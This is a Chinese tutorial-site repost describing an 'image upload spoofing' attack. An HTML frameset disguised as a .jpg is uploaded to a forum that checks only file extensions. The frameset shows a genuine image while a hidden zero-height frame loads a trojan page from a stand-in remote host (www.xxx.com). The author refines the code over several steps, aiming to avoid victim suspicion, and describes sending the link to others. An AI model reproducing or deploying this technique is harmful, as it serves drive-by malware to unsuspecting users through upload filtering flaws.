盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

图片上传欺骗攻击

时间:2024/2/29作者:未知来源:盘绰网教程人气:


[摘要]这个漏洞适用于所有只检查上传文件格式的程序, 把图片改成HTML代码, 上传后可执行 做转向, 发现的过程是我今天看了一下某门户网站的BBS上做了过滤, 上传失败, 然后回到主页上, 发现是动力系统...

这个漏洞适用于所有只检查上传文件格式的程序, 把图片改成HTML代码, 上传后可执行 做转向, 发现的过程是我今天看了一下某门户网站的BBS上做了过滤, 上传失败, 然后回到主页上, 发现是动力系统, 于是注册了一个帐号, 然后到个人管理里, 看到添加文章里面 能上传、文件, 于是开始想利用的过程。 我开始的构思是直接上传这样一个程序。

其实这样有很大一个漏洞, 别人打开这些JPG网页后, 图片显示不出来, 自然别人就会起疑心, 想到了前段时间的CHM网页木马的制作的方法, 变相的利用它应该能达到这样的效果吧?假如代码为:

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="cha.htm"  frameborder="no" scrolling="no"   noresize

marginwidth="0" margingheight="0">

</frameset>

这样的一个index.htm, 上传后发现失败, 直接显示原代码。 于是在代码的开头结尾加了如下的代码:

<html>

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="cha.htm"  frameborder="no" scrolling="no"   noresize

marginwidth="0" margingheight="0">

</frameset></html>

测试后页面已经成了一个木马页面, 但是这个木马一定要有个CHM的人才行, 网站不可能专门提供你上传这个类型的文件吧?!于是想到远程的调用, 后把Index.jpg改为代码:

<html>

<frameset rows="444,0" cols="*">

<frame src="index.htm" framborder="no" scrolling="auto" noresize

marginwidth="0" margingheight="0">

<frame src="http://www.xxx.com/cha.htm"  frameborder="no"

scrolling="no"   noresize marginwidth="0" margingheight="0">

</frameset></html>

上传后发现 , 防火墙成功提示病毒, 但是别人打开这个页面的时候直接是大红XX, 有脑子的人都会怀疑。 于是想到把这个页面打开后看成一个图片, 接着直接把上面的代码改成:

<html>

<frameset rows="444,0" cols="*">

<frame src="/UpLoadFiles/NewsPhoto/omasuiai.jpg" framborder="no"

scrolling="auto" noresize marginwidth="0" margingheight="0">

<frame src="http://www.xxx.com/cha.htm"  frameborder="no"

scrolling="no"   noresize marginwidth="0" margingheight="0">

</frameset></html>

这样打开这个页面的时候正常显示图片, 木马也能中了!前提是要把这个图片页面发给别人, 例如:www.***.com/UpLoadFiles/NewsPhoto/08aXXXXX.jpg, 对方打开后还以为是看到了一张图片, 其实他已经中木马了, 再怎么说这个也是上传的图片, 而且可以上传到自己的站里, 不会有人怀疑的!


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  图片上传欺骗攻击





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版